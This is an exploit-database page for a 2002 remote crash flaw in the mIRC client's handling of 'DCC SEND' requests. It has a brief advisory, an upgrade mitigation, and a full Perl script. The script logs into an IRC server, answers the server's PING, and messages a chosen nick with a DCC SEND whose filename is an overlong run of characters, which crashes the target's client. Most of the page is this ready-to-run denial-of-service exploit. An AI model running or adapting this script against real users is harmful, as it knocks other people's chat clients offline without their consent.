header-logo
Suggest Exploit
vendor:
mIRC Client
by:
SecurityFocus
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: mIRC Client
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

mIRC Client DCC SEND Request Remote Crash Vulnerability

A vulnerability has been reported to exist in the mIRC client that may allow a remote attacker to crash a vulnerable mIRC client. The condition is most likely present due to insufficient boundary checking performed on 'DCC SEND' requests. It has been reported that when received, a malicious 'DDC SEND' request can trigger a fatal error and cause an affected mIRC client to crash.

Mitigation:

Upgrade to the latest version of mIRC
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8818/info

A vulnerability has been reported to exist in the mIRC client that may allow a remote attacker to crash a vulnerable mIRC client. The condition is most likely present due to insufficient boundary checking performed on 'DCC SEND' requests.

It has been reported that when received, a malicious 'DDC SEND' request can trigger a fatal error and cause an affected mIRC client to crash. 

#!/usr/bin/perl -w
use IO::Socket;
# get irc server to connect to, and nick to exploit.
print "Enter Serv: "; chomp($serv=<STDIN>);
print "Enter Nick: "; chomp($nick=<STDIN>);

#setup connection
$ocket = IO::Socket::INET->new(
                        PeerAddr=>"$serv",
			PeerPort=>'6667'
			) || die "could not connect to $serv: $!";

#$| = 1;
#$ocket->autoflush();
$line="";
until($line =~ /Ident/){
	$oldline=$line;
	$line = <$ocket>;
	if($oldline ne $line) {print $line;}
}

print $ocket "user ident irc name ircname\n";  #send ident/ircname info

$line="";
until($line =~/PING/){
	$oldline=$line;
	$line = <$ocket>;
	if ($oldline ne $line) {print $line;}
}


$line =~ s/.*://;
print $ocket "PONG :$line\n";
print $ocket "nick thssmnck\n";
print $ocket "privmsg $nick :DCC SEND \"a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a \" 1079095848 666\n";

Navigation

Suggest Exploit

Services By CQR